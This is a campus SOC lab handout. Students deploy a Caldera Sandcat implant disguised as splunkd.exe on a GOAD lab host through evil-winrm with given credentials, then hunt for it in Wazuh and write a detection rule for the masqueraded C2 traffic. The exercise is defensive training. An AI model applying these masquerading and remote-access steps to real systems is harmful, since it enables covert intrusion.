Labs
Malware Lab

Malware Lab

Introduction

In this lab you will use the adversary emulation framework Caldera, along with the SIEM solution Wazuh in order to deploy malware on a machine and track the malwares execution in the SIEM alerts.

NOTE: This lab can only be done in the EduSOC on campus.

Pre-requisites

  • A Kali Linux VM

Deploying Malware

Generating payload

The first step is generating some malware, for our case it will be a Caldera agent.

To access Caldera, navigate to https://caldera.soc.local

Once promted for a login, enter the following credentials:

  • Username: admin
  • Password: admin

Once logged in you should see the Caldera dashboard.

Caldera dashboard

\newpage

From here you want to navigate to the agents tab on the left column.

Agents tab

From here you want you want to click on Deploy an agent > Sandcat > Windows.

Sandcat is the name for the default Caldera implant. It is written in Golang and it is cross compatible across Windows, Linux and MacOS.

Agent configuration

  • agent.contact.http: This is the address the malware will report to so this should always be the address of our server. By default it should be set correctly.
  • agents.implant_name: This will be the name of the actual executable on the machine. By default it is splunkd.exe to make it seem like it is a legitimate Splunk process.
  • agent.extensions: This is an optional field to add extra features to the agent. We won’t be needing it and leaving it empty.

Now you can copy the generated payload command and paste it on the victim machine.

Installing Agent on Victim

THe victim machine will be the winterfell machine on the GOAD network.

On a Kali Terminal, access the the victim machine with the following command:

evil-winrm -u robb.stark -p sexywolfy -i 10.8.10.11

This gives us a shell on the user robb.stark.

Shell on user

And here we can go ahead and paste the payload command from the last step

Running payload

You will know it is successful if you don’t get any errors and you see your agent appear on the agents tab in Caldera

Agents list

Analyzing Malware Execution in Wazuh SIEM

Accessing Wazuh

Now that we have deployed the Caldera agent on the victim machine, we need to analyze the security events generated by this malware execution.

Navigate to the Wazuh SIEM at https://wazuh.soc.local

Log in with the credentials provided by your instructor.

Once logged in, you should see the Wazuh dashboard.

Threat Hunting

From the main dashboard, navigate to the Threat Hunting tab.

Threat Hunting tab

And then go to the Events tab.

Events tab

Here you will see a timeline of security events captured by Wazuh agents running on monitored systems.

Identifying Malware Execution Events

To find events related to our Caldera agent execution, you need to:

  1. Press Add filter and fill out with the following:

    • field: agent.name
    • Operator: is
    • Value: winterfell

Agent filter

  1. Look for suspicious process creation events: Search for events related to:

    • PowerShell execution (since our payload was a PowerShell command)
    • New process creation for splunkd.exe (or whatever implant name you configured)
    • Network connections to the Caldera server IP 192.168.251.11
    • File creation events in user directories

  2. Key indicators to look for:

    • Suspicious executions of PowerShell
    • The creation of splunkd.exe in an unusual location (not the legitimate Splunk installation path)
    • Network connections from splunkd.exe to external/unusual IP addresses

Questions to answer:

  • What is the legitimate process that was abused to spawn the malware?

\vspace{3cm}

  • What is the full command line of the agents execution?

\vspace{3cm}

  • What network connections did the malware establish?

\vspace{3cm}

  • What is the first command the agent executed automatically?

\vspace{3cm}

Take screenshots of the relevant events and document the Event IDs and rule IDs that triggered.

Writing a Wazuh Detection Rule

Now that you’ve identified the indicators of compromise (IOCs), you will create a custom Wazuh rule to detect similar malware executions in the future.

Understanding the Event Structure

First, examine one of the events you identified. Click on the event to expand its details and review the JSON structure. Pay attention to:

  • data.win.eventdata.commandLine: The command that was executed
  • data.win.eventdata.image: The process that was created
  • data.win.eventdata.parentImage: The parent process
  • rule.id: The current rule that triggered (if any)

Creating the Custom Rule

Navigate to Server Managment -> Rules in the left side bar.

Rules tab{width=480px}

Click on Add new rules file

New rules file

<group name="sysmon,sysmon_event3,caldera,malware,c2_communication,">
  <!-- Detect splunkd.exe specifically connecting to C2 -->
  <rule id="100212" level="15">
    <if_sid>100210</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\splunkd\.exe$</field>
    <field name="win.eventdata.image" type="pcre2" negate="yes">(?i)C:\\Program Files\\Splunk</field>
    <description>Caldera Sandcat agent C2 communication: Masqueraded splunkd.exe connecting to 192.168.251.11</description>
    <mitre>
      <id>T1071</id>
      <id>T1095</id>
      <id>T1571</id>
      <id>T1036.005</id>
    </mitre>
  </rule>
</group>